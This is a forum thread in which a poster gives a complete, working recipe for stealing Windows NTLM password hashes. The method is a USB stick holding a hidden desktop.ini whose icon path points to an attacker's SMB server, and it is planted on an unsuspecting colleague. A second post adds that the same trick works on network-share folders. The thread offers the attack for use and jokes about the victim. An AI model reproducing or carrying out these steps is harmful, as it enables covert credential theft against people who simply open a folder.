Bytewolf Posted September 7, 2016 Share Posted September 7, 2016 After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf -= HowTo do it =- Grab any USB-Stick you have laying around Create a Directory Set the System attribute of this directory with attrib +s <dirname> Create a file called desktop.ini in this directory with the following content [.ShellClassInfo] IconResource=\\<YourIP>\tmp\demo.ico IconFile=%SystemRoot%\system32\shell32.dll IconIndex=-235 Save the desktop.ini as Unicode or UTF-8 file Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini Preparation -> Done Put some RFCs in the directory. Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up. Quote Link to comment Share on other sites More sharing options...
Bytewolf Posted September 8, 2016 Author Share Posted September 8, 2016 Just a quick not on that. This method works also on folders which are on a networkshare. I would call it "Bad Folder" now. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.